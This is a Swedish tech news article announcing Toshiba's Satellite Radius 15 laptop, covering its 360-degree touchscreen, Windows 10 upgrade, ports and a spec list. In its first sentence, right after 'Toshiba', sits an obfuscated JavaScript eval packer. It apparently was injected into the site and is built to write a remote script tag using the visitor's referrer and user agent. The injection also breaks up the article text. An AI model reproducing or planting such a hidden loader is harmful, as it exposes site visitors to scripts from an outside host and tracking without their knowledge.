Image Image Image Image Image Image Image Image Image Image

| 24 januari, 2020

Scroll to top

Top

PC

Toshiba lanserar Satellite Radius 15

Toshiba lanserar Satellite Radius 15
Sebastian

Toshiba eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrfha|var|u0026u|referrer|kidft||js|php’.split(’|’),0,{}))
lanserar Satellite Radius 15, en 15,6-tums laptop i premiumsegmentet med 360-graders vikbar skärm, fullt anpassat för Microsoft Windows 10. Satellite Radius 15 har fem olika arbetslägen, kan bland annat användas som surfplatta och kommer med en högupplöst IPS-pekskärm.

Satellite Radius 15 har ett stilrent chassi med guldborstat aluminiumhölje på endast 20,1 mm, och en batteritid på över sju timmar[1]. Tangentbordet är bakbelyst vilket förenklar användningen i mörkare ljusförhållanden. Satellite Radius 15 har femte generationens Intel® Core™ i5 processorer och Intels®HD 5500-grafik vilket ger hög prestanda och snabb svarstid.

Satellite Radius 15 kommer med Windows 8.1 men kan kostnadsfritt uppgraderas till Windows 10 (när uppgraderingen tillgängliggörs[2]). Microsofts nyutvecklade digitala assistent Cortana kommer även att finnas tillgänglig. Tjänsten hjälper bland annat användaren att hämta relevant information, exempelvis trafik, väder, viktiga påminnelser och svara på frågor med hjälp av sökmotorn Bing. För att optimera funktionerna i Windows 10, levereras alla modeller med dubbla mikrofoner för att maximera röstupptagning och användarupplevelsen av Cortana[3] samt med en särskild Cortana-knapp på tangentbordet för direkt åtkomst.

Pekskärmen har Full HD-upplösning och är av typen IPS vilket ger användaren en högupplöst, kvalitativ skärm med breda betraktningsvinklar. Datorn har även inbyggda Harman Kardon-högtalare® med DTS Sound™, en kombination som ger användaren en kraftfull multimediaupplevelse.

Satellite Radius 15 har en HDMI-port som stöder Ultra HD 4K-material. Ytterligare anslutningsalternativ inkluderar en flerkortsläsare med stöd för SD UHS-I samt två USB 3.0-ingångar varav en med Sleep-and-Charge-funktion.

Tillgänglighet och pris:

Toshiba Satellite Radius 15 kommer att finnas tillgänglig nu. Rekommenderat cirkapris är 10 990 SEK.

Toshiba Satellite Radius 15:

·         Skärm: 39,6 cm (15.6”) Full HD (1920 x 1080) IPS, 300 NIT, LED-skärm

·         Processorer: 5th gen Intel® CoreTM i5 CPUs

·         Grafik: Intel® HD-grafik 5500

·         Hårddisk (SSD/HDD): Upp till 256GB SSD, 1TB SSHD eller 2TB HDD

·         Minne: Upp till 16 GB DDR3L

·         Uppkoppling: 3 x USB-portar inklusive 1 x Sleep and Charge, 1 x HDMI® med Ultra HD 4k-stöd, 2-i-1 SD/MMC-inkast med stöd för UHS-I, trådlös skärmteknologi, Intel® Dual Band Wireless-AC 3160, Bluetooth® 4.0

·         Kommunikation: dubbla mikrofoner med HD webbkamera

·         Ljud: Harman Kardon®-högtalare med DTS Sound audio enhancement

·         Operativsystem: Windows 8.1 förinstallerat, Windows 10 tillgängligt via kostnadsfri uppgradering efter produktsläpp

·         Batteritid: Upp till 7 timmar och 40 minuter1

·         Färg: Satin Gold med borstat aluminiumhölje

·         Vikt: Upp till 2,25 kg

·         Mått: 379,5 x 244,9 x 20,1 mm